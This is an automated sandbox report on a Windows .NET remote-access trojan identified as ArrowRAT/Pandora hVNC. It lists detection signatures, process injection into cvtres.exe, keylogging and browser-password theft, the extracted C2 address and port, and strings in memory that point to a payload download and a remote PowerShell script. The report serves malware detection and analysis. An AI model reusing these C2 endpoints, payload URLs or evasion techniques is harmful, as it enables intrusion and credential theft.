Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IWsK3V2Ul9.exe

Overview

General Information

Sample name:IWsK3V2Ul9.exe
renamed because original name is a hash value
Original sample name:040cef4a919bf259e750029187dcfeff8b4b8f18e6a65cb401ee941d7999dd51.exe
Analysis ID:1516618
MD5:d89a424f932b8a69a4657e7ec09944da
SHA1:7e1b1c99d1bc8fdbc8173ca9eda77dd2f4fd287c
SHA256:040cef4a919bf259e750029187dcfeff8b4b8f18e6a65cb401ee941d7999dd51
Tags:51-254-27-112exeuser-JAMESWT_MHT
Infos:

Detection

ArrowRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected ArrowRAT
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Explorer NOUACCHECK Flag
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • IWsK3V2Ul9.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\IWsK3V2Ul9.exe" MD5: D89A424F932B8A69A4657E7EC09944DA)
    • explorer.exe (PID: 1280 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
    • cvtres.exe (PID: 1852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 147.185.221.17 55141 YnZwwlrYv MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • conhost.exe (PID: 1592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 3860 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ArrowRATIt is available as a service, purchasable by anyone to use in their own campaigns. Its features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat
{"C2 url": "147.185.221.17", "Port": "55141", "Identifier": "Client", "Mutex": "YnZwwlrYv"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_ArrowRATYara detected ArrowRATJoe Security
    00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ArrowRATYara detected ArrowRATJoe Security
      Process Memory Space: IWsK3V2Ul9.exe PID: 6948JoeSecurity_ArrowRATYara detected ArrowRATJoe Security
        Process Memory Space: IWsK3V2Ul9.exe PID: 6948JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: cvtres.exe PID: 1852JoeSecurity_ArrowRATYara detected ArrowRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.IWsK3V2Ul9.exe.20e800905f0.0.unpackJoeSecurity_ArrowRATYara detected ArrowRATJoe Security
              4.2.cvtres.exe.400000.0.unpackJoeSecurity_ArrowRATYara detected ArrowRATJoe Security
                0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpackJoeSecurity_ArrowRATYara detected ArrowRATJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1060, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 3860, ProcessName: explorer.exe
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: IWsK3V2Ul9.exeAvira: detected
                  Source: 0.0.IWsK3V2Ul9.exe.20efc780000.0.unpackMalware Configuration Extractor: ArrowRAT {"C2 url": "147.185.221.17", "Port": "55141", "Identifier": "Client", "Mutex": "YnZwwlrYv"}
                  Source: IWsK3V2Ul9.exeReversingLabs: Detection: 78%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: IWsK3V2Ul9.exeJoe Sandbox ML: detected
                  Source: IWsK3V2Ul9.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: IWsK3V2Ul9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\User\Desktop\Pandora DevExpress New\1.8.6 Ready to use\DLL\obj\Release\DLL.pdb source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: .pdb source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdbd( source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\User\Desktop\Pandora DevExpress New\1.8.6 Ready to use\DLL\obj\Release\DLL.pdbd( source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 147.185.221.17
                  Source: global trafficTCP traffic: 192.168.2.11:49702 -> 147.185.221.17:55141
                  Source: Joe Sandbox ViewIP Address: 147.185.221.17 147.185.221.17
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                  Source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.254.27.112:1337/skra.jpg
                  Source: cvtres.exe, 00000004.00000002.3875809384.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps1

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: IWsK3V2Ul9.exe, Program.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeCode function: 0_2_00007FFE7E1B2E69 CreateDesktopW,0_2_00007FFE7E1B2E69

                  System Summary

                  barindex
                  Source: IWsK3V2Ul9.exe, HVNC.csLong String: Length: 65580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013BA8604_2_013BA860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013BF2104_2_013BF210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013BFAE04_2_013BFAE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013BA84F4_2_013BA84F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013BEEC84_2_013BEEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_030D3E584_2_030D3E58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_030D0EA84_2_030D0EA8
                  Source: IWsK3V2Ul9.exe, 00000000.00000000.1414974566.0000020EFC7AA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs IWsK3V2Ul9.exe
                  Source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDLL.exe" vs IWsK3V2Ul9.exe
                  Source: IWsK3V2Ul9.exeBinary or memory string: OriginalFilenameStub.exe" vs IWsK3V2Ul9.exe
                  Source: IWsK3V2Ul9.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: IWsK3V2Ul9.exe, Pikolo.csCryptographic APIs: 'TransformFinalBlock'
                  Source: IWsK3V2Ul9.exe, Pikolo.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, PandoraRecovery.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, PandoraRecovery.csCryptographic APIs: 'TransformFinalBlock'
                  Source: IWsK3V2Ul9.exe, Installer.csBase64 encoded string: 'U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c', 'U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=', 'U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c'
                  Source: IWsK3V2Ul9.exe, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: IWsK3V2Ul9.exe, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, HVNC.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, HVNC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@0/1
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IWsK3V2Ul9.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: \Sessions\1\BaseNamedObjects\YnZwwlrYv
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1592:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile created: C:\Users\user\AppData\Local\Temp\TMP_passJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: IWsK3V2Ul9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: IWsK3V2Ul9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\explorer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: cvtres.exe, 00000004.00000003.1433120965.000000000161D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3875809384.000000000334B000.00000004.00000800.00020000.00000000.sdmp, TMP_pass.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: IWsK3V2Ul9.exeReversingLabs: Detection: 78%
                  Source: unknownProcess created: C:\Users\user\Desktop\IWsK3V2Ul9.exe "C:\Users\user\Desktop\IWsK3V2Ul9.exe"
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                  Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 147.185.221.17 55141 YnZwwlrYv
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 147.185.221.17 55141 YnZwwlrYvJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: IWsK3V2Ul9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: IWsK3V2Ul9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\User\Desktop\Pandora DevExpress New\1.8.6 Ready to use\DLL\obj\Release\DLL.pdb source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: .pdb source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdbd( source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\User\Desktop\Pandora DevExpress New\1.8.6 Ready to use\DLL\obj\Release\DLL.pdbd( source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
